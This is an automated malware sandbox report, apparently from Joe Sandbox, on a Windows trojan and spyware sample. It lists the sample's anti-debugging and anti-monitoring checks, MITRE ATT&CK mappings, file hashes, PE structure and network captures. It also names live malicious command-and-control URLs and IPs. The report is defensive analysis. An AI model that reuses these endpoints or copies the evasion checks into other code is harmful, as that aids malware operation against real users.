Source: XJiB3BdLTg.exe, 00000000.00000003.1629713995.0000000007101000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1672096065.0000000007171000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File opened: NTICE
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File opened: SICE
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_003A9980 rdtsc 0_2_003A9980
Source: XJiB3BdLTg.exe, 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: +Program Manager
Source: XJiB3BdLTg.exe | Binary or memory string: +Program Manager
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.3:49712 -> 34.147.147.173:80
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
XJiB3BdLTg.exe | 49% | Virustotal |
XJiB3BdLTg.exe | 100% | Avira | TR/Crypt.TPM.Gen
XJiB3BdLTg.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fortth14vs.top | 34.147.147.173 | true | false | | high
httpbin.org | 34.197.122.172 | true | false | | high
18.31.95.13.in-addr.arpa | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: malware | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: malware | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1 | XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://html4/loose.dtd | XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | XJiB3BdLTg.exe | false | | high
https://httpbin.org/ipbefore | XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/http-cookies.html | XJiB3BdLTg.exe, XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/hsts.html# | XJiB3BdLTg.exe | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4 | XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/alt-svc.html | XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
34.147.147.173 | home.fortth14vs.top | United States | 2686 | ATGS-MMD-ASUS | false
34.197.122.172 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582830
Start date and time: 2024-12-31 15:40:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XJiB3BdLTg.exe (renamed because original name is a hash value)
Original Sample Name: 767f4aff1a89b1abfe6a843f7750bd5b.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@10/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.95.31.18, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            34.147.147.173Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            34.197.122.172yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                              ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    home.fortth14vs.topBo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.147.147.173
| | r8nllkNEQX.exe | malicious | Unknown | 91.149.241.220 |
| | yqUQPPp0LM.exe | malicious | Unknown | 91.149.241.220 |
| | ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220 |
| | Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220 |
| httpbin.org | Bo6uO5gKL4.exe | malicious | Unknown | 34.200.57.114 |
| | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114 |
| | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114 |
| | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172 |
| | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114 |
| | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172 |
| | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172 |
| | Set-up.exe | malicious | Unknown | 52.202.253.164 |
| | Set-up.exe | malicious | Unknown | 34.197.122.172 |
| | Set-up.exe | malicious | Unknown | 52.73.63.247 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| AMAZON-AESUS | Bo6uO5gKL4.exe | malicious | Unknown | 34.200.57.114 |
| | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114 |
| | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114 |
| | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172 |
| | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114 |
| | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172 |
| | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172 |
| | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105 |
| | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69 |
| | Set-up.exe | malicious | Unknown | 52.202.253.164 |
| ATGS-MMD-ASUS | Bo6uO5gKL4.exe | malicious | Unknown | 34.147.147.173 |
| | http://usps.com-trackaddn.top/l | malicious | Unknown | 34.54.88.138 |
| | cbr.x86.elf | malicious | Mirai | 57.13.227.38 |
| | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 34.36.178.232 |
| | kwari.ppc.elf | malicious | Unknown | 48.233.101.215 |
| | kwari.arm.elf | malicious | Unknown | 57.204.182.195 |
| | kwari.mpsl.elf | malicious | Unknown | 57.206.149.213 |
| | kwari.arm7.elf | malicious | Mirai | 34.31.161.194 |
| | https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 57.182.72.119 |
| | botx.mips.elf | malicious | Mirai | 32.75.183.191 |
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):7.984843401156656
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • VXD Driver (31/22) 0.00%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:XJiB3BdLTg.exe
                                    File size:4'471'296 bytes
                                    MD5:767f4aff1a89b1abfe6a843f7750bd5b
                                    SHA1:d05134107cb88e143b16ca89cb6f3ec675d06d36
                                    SHA256:68783c123f5c9c302811fc6391329010a372fc583f5af03c4f65d0656a8a165e
                                    SHA512:1c451b2571e52210fba20615ae66b22b8e7b18ec2d8fd5b7fcb5c1c2799b0b4be9f92140c7f44a61c65f1bc511765b02161567b4d1a639cb0fc5dc71c0e8e3c9
                                    SSDEEP:98304:ellSccFHznisoBFtF4bSNj7QQGiNOWkdNoXvY1c1QVovEx+/Mx3oASj:e/GlnKq2jKGkdNaY1c1KMETaTj
                                    TLSH:B82633179F37A1D7F86DD1B2252703261873E9AA0D38DB9135908C77F2AAD251EB0C1B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...@........M...@..........................p.......uD...@... ............................
                                    Icon Hash:90cececece8e8eb0
                                    Entrypoint:0x1094000
                                    Entrypoint Section:.taggant
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:DYNAMIC_BASE
                                    Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                    Signature Valid:
                                    Signature Issuer:
                                    Signature Validation Error:
                                    Error Number:
                                    Not Before, Not After
                                      Subject Chain
                                        Version:
                                        Thumbprint MD5:
                                        Thumbprint SHA-1:
                                        Thumbprint SHA-256:
                                        Serial:
                                        Instruction
                                        jmp 00007F5BD0FF48CAh
                                        prefetchNTA byte ptr [eax+eax+00h]
                                        add byte ptr [eax], al
                                        add cl, ch
                                        add byte ptr [eax], ah
                                        add byte ptr [eax], al
                                        add byte ptr [0000000Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [edx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [0200000Ah], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74c05f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74b000 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x778200 | 0x688 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc92a34 | 0x10 | lggscavc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc929e4 | 0x18 | lggscavc |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x74a000 | 0x289000 | ee4b99a9b2b2beec1240326f9f71d697 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x74b000 | 0x2b0 | 0x200 | c575cc438573d21ecac038b7736bf19b | False | 0.794921875 | data | 6.029310786600082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x74c000 | 0x1000 | 0x200 | 52564c2cea63394dbc4e71775ebabcc0 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x74d000 | 0x38f000 | 0x200 | a73fc2d648b5db4ca1c9e39af9ba752e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| lggscavc | 0xadc000 | 0x1b7000 | 0x1b6e00 | db9e7ae11ed89345dd479b6dcc1ecb7b | False | 0.9945723040088293 | data | 7.956092782324055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| pdskyepf | 0xc93000 | 0x1000 | 0x400 | a1435739b920aca7d779fbfa28a53670 | False | 0.7646484375 | data | 6.034974157084678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xc94000 | 0x3000 | 0x2200 | d8a533a4eb757d593adac0c6bb5dd156 | False | 0.06066176470588235 | DOS executable (COM) | 0.7864552441216863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0xc92a44 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |

| DLL | Import |
| kernel32.dll | lstrcpy |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| Dec 31, 2024 15:42:08.277951956 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:08.278001070 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:08.278062105 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:08.289216995 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:08.289237022 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:08.984332085 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:08.987535000 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:08.987562895 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:08.989168882 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:08.989233971 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:08.991823912 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:08.992230892 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:09.000216007 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:09.000235081 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:09.040512085 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:09.487379074 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:09.487462997 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:09.487509966 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:09.515841961 CET | 49711 | 443 | 192.168.2.3 | 34.197.122.172 |
| Dec 31, 2024 15:42:09.515867949 CET | 443 | 49711 | 34.197.122.172 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.529638052 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.534636021 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.534792900 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.555784941 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.560784101 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560807943 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560832024 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560843945 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560854912 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560867071 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560872078 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560930014 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.560956955 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560964108 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560970068 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.560975075 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.561111927 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.565850019 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.565866947 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.565893888 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.565906048 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.565928936 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.565941095 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.565957069 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.565984011 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.566044092 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.566128969 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.607356071 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.607551098 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.659471989 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
